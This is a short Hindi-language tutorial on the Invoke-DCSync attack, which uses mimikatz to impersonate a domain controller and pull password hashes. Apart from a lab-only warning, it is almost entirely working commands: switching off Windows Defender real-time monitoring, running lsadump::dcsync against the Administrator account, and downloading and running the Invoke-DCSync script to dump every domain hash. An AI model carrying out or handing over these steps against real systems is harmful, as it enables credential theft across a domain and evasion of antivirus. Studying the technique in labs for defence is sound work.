
Invoke-DCSync
Invoke-DCSync संदर्भ: https://adsecurity.org/?p=1729 संदर्भ: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ उद्देश्य: mimikatz DCSync फ़ंक्शन का उपयोग करके डोमेन कंट्रोलर पर सभी उपयोगकर्ता खातों से पासवर्ड हैश प्राप्त करना।
चेतावनी:केवल प्रयोगशाला वातावरण में ही ऐसा करें।
mimikatz ने DCSync नामक एक टूल लागू किया है, यह mimikatz को डोमेन कंट्रोलर का रूप धारण करने और किसी अन्य डोमेन कंट्रोलर से सभी पासवर्ड हैश प्राप्त करने का प्रयास करने की अनुमति देता है।
आपको Windows Defender को अक्षम करने की आवश्यकता हो सकती है।
PowerShell को व्यवस्थापक के रूप में खोलें और टाइप करें।
$ Set-MpPreference -DisableRealtimeMonitoring $true
mimikatz प्रारंभ करें।
$ lsadump::dcsync /domain:test.local /user:Administrator
अब आपके पास उस उपयोगकर्ता का पासवर्ड हैश है।
इसके लिए आवश्यक है कि आपके पास Administrator पहुंच हो, विशेष रूप से Get-Replication-Changes-All Common Name विशेषता।
सभी हैश निकालने के लिए Invoke-DCSync मॉड्यूल का उपयोग कर सकते हैं।
यहाँ से डाउनलोड करें: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat